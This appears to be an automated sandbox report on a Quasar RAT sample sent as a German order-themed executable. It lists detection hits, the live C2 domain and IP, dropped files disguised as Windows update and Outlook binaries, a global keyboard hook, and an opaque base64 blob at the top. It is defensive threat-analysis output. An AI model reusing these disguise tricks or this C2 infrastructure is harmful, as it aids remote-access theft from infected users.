5M9mVSHsqADSL40SjK3eoxcj33cMgMS5dvNB6o25l8QGJtuhz+IGqtCQaU13ev1YxTwOZKYjwwpSIycpV+LDmoR2dWgyDhjbhkuJ92reL16ND9DcZRTwrx6Idyy3oKrUyWlS6kHIXujTQHvvU+qLgfgQJYOryT0iRcn6DWkhLzRq0yzhrgD3ZPPreZ3xJ/RSnyvRjOEivReVBDlm0eWbg0J2bpOa1cDdlfsRg9nuZWkXeghkFtzvgOB0rkgRYD+m0S5N/qlhPXETBO5sGqHsSHTPjyAnVyP61Zr4cn/H0otTzReF6/FjIKsqH+v6Q27D0j6fJRbvTtShZdOzT6RtyoCh1HIeByJX5Ae18uHkU+wvUXXaIijYOR5"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeReversingLabs: Detection: 47%
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeReversingLabs: Detection: 47%
                Multi AV Scanner detection for submitted file
                Source: Bestellung - 021224 - 901003637.exeReversingLabs: Detection: 47%
                Yara detected Quasar RAT
                Source: Yara matchFile source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 6052, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 2288, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eNuXmIwkixzW.exe PID: 3020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 3648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 4936, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 6088, type: MEMORYSTR
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: Bestellung - 021224 - 901003637.exeJoe Sandbox ML: detected
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 103.126.138.87:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2027619 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (Quasar CnC) : 193.34.212.17:5829 -> 192.168.2.8:49713
                Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 193.34.212.17:5829 -> 192.168.2.8:49713
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: hoffmann3.ydns.eu
                Yara detected Generic Downloader
                Source: Yara matchFile source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.8:49713 -> 193.34.212.17:5829
                Source: Joe Sandbox ViewIP Address: 103.126.138.87 103.126.138.87
                Source: Joe Sandbox ViewASN Name: PL-SKYTECH-ASPL PL-SKYTECH-ASPL
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: ipwho.is
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: hoffmann3.ydns.eu
                Source: global trafficDNS traffic detected: DNS query: ipwho.is
                Source: Bestellung - 021224 - 901003637.exe, outlooks.exe.9.dr, eNuXmIwkixzW.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: Bestellung - 021224 - 901003637.exe, outlooks.exe.9.dr, eNuXmIwkixzW.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: outlooks.exe, 00000016.00000002.3872064876.000000000179B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.
                Source: outlooks.exe, 00000016.00000002.3872064876.0000000001781000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: outlooks.exe, 00000016.00000002.3872064876.000000000179B000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.22.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: outlooks.exe, 00000016.00000002.3874269347.00000000035F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is
                Source: outlooks.exe, 00000016.00000002.3874269347.00000000035F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwho.isd
                Source: outlooks.exe, 0000000F.00000002.1685100686.00000000033B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: Bestellung - 021224 - 901003637.exe, outlooks.exe.9.dr, eNuXmIwkixzW.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: outlooks.exe, 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                Source: outlooks.exe, 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/d
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1448519828.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1499776253.0000000003191000.00000004.00000800.00020000.00000000.sdmp, eNuXmIwkixzW.exe, 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 0000000F.00000002.1685100686.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3874269347.00000000033DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: outlooks.exe, 00000016.00000002.3874269347.00000000035E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3874269347.00000000035E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3874269347.00000000033E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                Source: Bestellung - 021224 - 901003637.exe, outlooks.exe.9.dr, eNuXmIwkixzW.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownHTTPS traffic detected: 103.126.138.87:443 -> 192.168.2.8:49716 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe

                E-Banking Fraud

                barindex
                Yara detected Quasar RAT
                Source: Yara matchFile source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 6052, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 2288, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eNuXmIwkixzW.exe PID: 3020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 3648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 4936, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 6088, type: MEMORYSTR

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC22900_2_00FC2290
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC73740_2_00FC7374
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC20290_2_00FC2029
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC22800_2_00FC2280
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FCA4C20_2_00FCA4C2
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC29C80_2_00FC29C8
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC2B900_2_00FC2B90
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC2B810_2_00FC2B81
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC33780_2_00FC3378
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC35D00_2_00FC35D0
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC36C00_2_00FC36C0
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC1AAA0_2_00FC1AAA
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC1A140_2_00FC1A14
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC1B9C0_2_00FC1B9C
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC1B290_2_00FC1B29
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC1CA70_2_00FC1CA7
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC1E3A0_2_00FC1E3A
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC1E030_2_00FC1E03
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_00FC1FE20_2_00FC1FE2
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_05049AD00_2_05049AD0
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_05040F940_2_05040F94
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_0504E82F0_2_0504E82F
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_0504E8590_2_0504E859
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_0504E8680_2_0504E868
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_050439300_2_05043930
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_050439400_2_05043940
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_05049AC10_2_05049AC1
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_0980E2200_2_0980E220
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_098005B80_2_098005B8
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_098016280_2_09801628
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_09808B100_2_09808B10
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_09808B200_2_09808B20
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_09809F280_2_09809F28
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_0980A3600_2_0980A360
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_098082B00_2_098082B0
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_0980826F0_2_0980826F
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_098086D80_2_098086D8
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_098086E80_2_098086E8
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 9_2_016DF03C9_2_016DF03C
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B6229010_2_04B62290
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B6737410_2_04B67374
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B6A4C210_2_04B6A4C2
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B6202910_2_04B62029
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B629C810_2_04B629C8
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B62B9010_2_04B62B90
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B636D010_2_04B636D0
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B636C010_2_04B636C0
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B6337810_2_04B63378
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B61CA710_2_04B61CA7
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B61E3A10_2_04B61E3A
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B61E0310_2_04B61E03
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B61FE210_2_04B61FE2
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B61AAA10_2_04B61AAA
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B61A1410_2_04B61A14
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B61B9C10_2_04B61B9C
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 10_2_04B61B2910_2_04B61B29
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_0321229013_2_03212290
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_0321737413_2_03217374
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_032121F513_2_032121F5
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_0321202913_2_03212029
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_0321A4C313_2_0321A4C3
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_03212B8113_2_03212B81
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_03212B9013_2_03212B90
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_032136C013_2_032136C0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_032136D013_2_032136D0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_03211B2913_2_03211B29
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_03211B9C13_2_03211B9C
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_03211A1413_2_03211A14
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_03211AAA13_2_03211AAA
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_03211FE213_2_03211FE2
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_03211E3A13_2_03211E3A
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_03211E0313_2_03211E03
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_03211CA713_2_03211CA7
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_0893D3C013_2_0893D3C0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_089305B813_2_089305B8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_0893162813_2_08931628
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_08938B1013_2_08938B10
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_08938B2013_2_08938B20
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_08939F2813_2_08939F28
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_0893829A13_2_0893829A
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_089382B013_2_089382B0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_0893A36013_2_0893A360
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_0893F4E013_2_0893F4E0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_089386D813_2_089386D8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 13_2_089386E813_2_089386E8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F229015_2_032F2290
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F737415_2_032F7374
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F202915_2_032F2029
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032FA4C315_2_032FA4C3
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F2B8215_2_032F2B82
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F2B9015_2_032F2B90
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F29C815_2_032F29C8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F337815_2_032F3378
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F36C015_2_032F36C0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F35C215_2_032F35C2
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F35D015_2_032F35D0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F1B2915_2_032F1B29
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F1B9C15_2_032F1B9C
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F1A1415_2_032F1A14
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F1AAA15_2_032F1AAA
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F1FE215_2_032F1FE2
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F1E3A15_2_032F1E3A
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F1E0315_2_032F1E03
